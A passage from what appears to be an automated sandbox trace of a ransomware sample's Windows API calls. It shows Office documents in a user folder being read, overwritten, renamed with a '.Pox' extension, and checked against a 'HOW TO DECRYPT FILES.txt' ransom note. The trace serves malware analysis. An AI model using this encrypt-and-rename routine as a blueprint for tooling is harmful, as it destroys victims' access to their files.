lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx", lpFilePart=0x0) returned 0x5a [0039.768] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0039.768] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\1osfgjl0nyx-m.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.769] GetFileType (hFile=0x26c) returned 0x1 [0039.769] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0039.769] GetFileType (hFile=0x26c) returned 0x1 [0039.769] WriteFile (in: hFile=0x26c, lpBuffer=0x23ec888*, nNumberOfBytesToWrite=0xce00, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x23ec888*, lpNumberOfBytesWritten=0x3ae47c*=0xce00, lpOverlapped=0x0) returned 1 [0039.770] CloseHandle (hObject=0x26c) returned 1 [0039.772] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx", lpFilePart=0x0) returned 0x5a [0039.772] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx.Pox", lpFilePart=0x0) returned 0x5e [0039.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0039.772] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\1osfgjl0nyx-m.pptx"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91315cd0, ftCreationTime.dwHighDateTime=0x1d4d041, ftLastAccessTime.dwLowDateTime=0xd9396cb0, ftLastAccessTime.dwHighDateTime=0x1d4c6b0, ftLastWriteTime.dwLowDateTime=0x29e44220, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xce00)) returned 1 [0039.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0039.772] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\1osfgjl0nyx-m.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\1OSFGjl0nYx-M.pptx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\1osfgjl0nyx-m.pptx.pox")) returned 1 [0039.773] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls", lpFilePart=0x0) returned 0x5f [0039.773] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0039.773] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\2oyfkwprg4a574w2dlu.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.773] GetFileType (hFile=0x26c) returned 0x1 [0039.773] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0039.773] GetFileType (hFile=0x26c) returned 0x1 [0039.773] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0xe40f [0039.773] ReadFile (in: hFile=0x26c, lpBuffer=0x23f9d5c, nNumberOfBytesToRead=0xe40f, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x23f9d5c*, lpNumberOfBytesRead=0x3ae488*=0xe40f, lpOverlapped=0x0) returned 1 [0039.774] CloseHandle (hObject=0x26c) returned 1 [0039.821] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0039.822] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0039.822] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls", lpFilePart=0x0) returned 0x5f [0039.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0039.822] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\2oyfkwprg4a574w2dlu.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.823] GetFileType (hFile=0x26c) returned 0x1 [0039.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0039.823] GetFileType (hFile=0x26c) returned 0x1 [0039.823] WriteFile (in: hFile=0x26c, lpBuffer=0x24718e8*, nNumberOfBytesToWrite=0xe410, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x24718e8*, lpNumberOfBytesWritten=0x3ae47c*=0xe410, lpOverlapped=0x0) returned 1 [0039.824] CloseHandle (hObject=0x26c) returned 1 [0039.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls", lpFilePart=0x0) returned 0x5f [0039.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls.Pox", lpFilePart=0x0) returned 0x63 [0039.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0039.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\2oyfkwprg4a574w2dlu.xls"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3f6740, ftCreationTime.dwHighDateTime=0x1d4d4bc, ftLastAccessTime.dwLowDateTime=0x92dccad0, ftLastAccessTime.dwHighDateTime=0x1d4ce3c, ftLastWriteTime.dwLowDateTime=0x29eb6640, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xe410)) returned 1 [0039.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0039.826] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\2oyfkwprg4a574w2dlu.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\2OYFkWprG4a574w2dLu.xls.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\2oyfkwprg4a574w2dlu.xls.pox")) returned 1 [0039.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt", lpFilePart=0x0) returned 0x60 [0039.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0039.826] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\5hfaaxlrmbakfphynweq.ppt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.827] GetFileType (hFile=0x26c) returned 0x1 [0039.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0039.827] GetFileType (hFile=0x26c) returned 0x1 [0039.827] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x17948 [0039.827] ReadFile (in: hFile=0x26c, lpBuffer=0x3724370, nNumberOfBytesToRead=0x17948, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x3724370*, lpNumberOfBytesRead=0x3ae488*=0x17948, lpOverlapped=0x0) returned 1 [0039.829] CloseHandle (hObject=0x26c) returned 1 [0039.850] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0039.850] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.850] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0039.851] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt", lpFilePart=0x0) returned 0x60 [0039.851] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0039.851] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\5hfaaxlrmbakfphynweq.ppt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.852] GetFileType (hFile=0x26c) returned 0x1 [0039.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0039.852] GetFileType (hFile=0x26c) returned 0x1 [0039.852] WriteFile (in: hFile=0x26c, lpBuffer=0x3428650*, nNumberOfBytesToWrite=0x17950, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x3428650*, lpNumberOfBytesWritten=0x3ae47c*=0x17950, lpOverlapped=0x0) returned 1 [0039.854] CloseHandle (hObject=0x26c) returned 1 [0039.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt", lpFilePart=0x0) returned 0x60 [0039.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt.Pox", lpFilePart=0x0) returned 0x64 [0039.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0039.856] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\5hfaaxlrmbakfphynweq.ppt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd84469b0, ftCreationTime.dwHighDateTime=0x1d4d527, ftLastAccessTime.dwLowDateTime=0xb694bcb0, ftLastAccessTime.dwHighDateTime=0x1d4cfdd, ftLastWriteTime.dwLowDateTime=0x29f02900, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x17950)) returned 1 [0039.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0039.856] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\5hfaaxlrmbakfphynweq.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\5hfaAXLRMbakfPHYNwEQ.ppt.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\5hfaaxlrmbakfphynweq.ppt.pox")) returned 1 [0039.856] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc", lpFilePart=0x0) returned 0x5d [0039.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0039.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\crotm1_fzimenaqwf.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.857] GetFileType (hFile=0x26c) returned 0x1 [0039.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0039.857] GetFileType (hFile=0x26c) returned 0x1 [0039.857] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0xe523 [0039.857] ReadFile (in: hFile=0x26c, lpBuffer=0x23bb420, nNumberOfBytesToRead=0xe523, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x23bb420*, lpNumberOfBytesRead=0x3ae488*=0xe523, lpOverlapped=0x0) returned 1 [0039.858] CloseHandle (hObject=0x26c) returned 1 [0039.912] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0039.912] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.912] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0039.912] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc", lpFilePart=0x0) returned 0x5d [0039.912] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0039.913] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\crotm1_fzimenaqwf.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.914] GetFileType (hFile=0x26c) returned 0x1 [0039.914] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0039.914] GetFileType (hFile=0x26c) returned 0x1 [0039.914] WriteFile (in: hFile=0x26c, lpBuffer=0x243330c*, nNumberOfBytesToWrite=0xe530, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x243330c*, lpNumberOfBytesWritten=0x3ae47c*=0xe530, lpOverlapped=0x0) returned 1 [0039.915] CloseHandle (hObject=0x26c) returned 1 [0039.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc", lpFilePart=0x0) returned 0x5d [0039.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc.Pox", lpFilePart=0x0) returned 0x61 [0039.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0039.917] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\crotm1_fzimenaqwf.doc"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34f01770, ftCreationTime.dwHighDateTime=0x1d4cd73, ftLastAccessTime.dwLowDateTime=0x28d0b150, ftLastAccessTime.dwHighDateTime=0x1d4cbbd, ftLastWriteTime.dwLowDateTime=0x29f9ae80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xe530)) returned 1 [0039.917] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0039.917] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\crotm1_fzimenaqwf.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\CrOtm1_fzIMEnAQWf.doc.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\crotm1_fzimenaqwf.doc.pox")) returned 1 [0039.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx", lpFilePart=0x0) returned 0x59 [0039.917] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0039.918] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eUU-xXmHIRDJW4 2Zx56\\b2naIXbZa6\\e5 uvmMI3me7.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\euu-xxmhirdjw4 2zx56\\b2naixbza6\\e5 uvmmi3me7.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.918] GetFileType (hFile=0x26c) returned 0x1 [0039.918] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0039.918] GetFileType (hFile=0x26c) returned 0x1 [0039.918] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x15c9e [0039.918] ReadFile (in: hFile=0x26c, lpBuffer=0x345ca20, nNumberOfBytesToRead=0x15c9e, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x345ca20*, lpNumberOfBytesRead=0x3ae488*=0x15c9e, lpOverlapped=0x0) returned 1 [0039.919] CloseHandle (hObject=0x26c) returned 1 [0039.935] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 